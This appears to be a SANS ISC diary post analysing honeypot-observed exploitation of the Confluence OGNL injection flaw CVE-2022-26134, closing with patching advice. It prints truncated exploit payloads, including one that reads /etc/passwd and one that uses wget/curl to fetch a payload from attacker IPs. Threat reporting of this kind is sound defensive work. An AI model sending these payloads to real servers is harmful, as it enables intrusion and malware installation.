Atlassian Confluence Exploits Seen By Our Honeypots (CVE-2022-26134)

Atlassian Confluence Exploits Seen By Our Honeypots (CVE-2022-26134)
Last week, Atlassian patched an unauthenticated remote code execution vulnerability in its Confluence Server and Data Center products. Confluence is a "Wiki" like product used by software development teams to document and organize the software development process. I would expect that most Atlassian customers use the cloud-hosted version of the software managed by Atlassian. But if you are running your own Atlassian server, you had to patch this yourself. Sadly, the vulnerability was discovered after it had already been exploited. The vulnerability was originally discovered by Volexity during incident response [2]. Once the details became known, creating new exploits was made easier due to similar vulnerabilities affecting Atlassian products in the past. The vulnerability is an OGNL Injection vulnerability. OGNL (Object Graph Navigation Language) is an expression language for Java objects. Simplistically speaking, think of it as SQL injection. But instead of injecting SQL, you are injecting Java code that is being executed. Here is one of the typical exploits you may be seeing used against Atlassian: `/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%2011762x11762%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.Buffered` Let's URL decode this, and add some line breaks for readability `/${(#_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('echo 11762x11762').getInputStream(), #b=new java.io.InputStreamReader(#a), #c=new java.io.Buffered` This would be a typical exploit to detect if a system is vulnerable. If the result of the operation is returned, the system is vulnerable. Here are a few other exploits we currently see: (URL decoded and only showing the first couple lines) Retrieving /etc/passwd: `/${(#_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream(), #b=new java.io.InputStreamReader(#a), #c=new java.io.Buffered` `Vulnerability scanner at work` `/${( #a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("echo vulnerable-status-determined-by-nexpose").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActio` Downloading more (malicious) things /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("(wget http://209.141.14.137/JavaApache\|\|curl http://209.141.41.137/JavaApache)").getInputStream(),"ut Of course, this is a critical vulnerability. But it is difficult to guestimate how many vulnerable exposed servers there are. A small sample from Shodan et al. shows some abandoned (or honeypot) servers. But just a couple of exploited servers may be a big deal as this may undermine the affected company's development process and could lead to supply chain-style attacks down the road. If you find an unpatched Confluence server: Assume it to be compromised. [1] https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html [2] https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ --- Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu Twitter\| I will be teaching next: Application Security: Securing Web Apps, APIs, and Microservices - SANS Cyber Defence Japan August 2022	Johannes 4514 Posts ISC Handler Jun 7th 2022
Reply Subscribe	Jun 7th 2022 4 weeks ago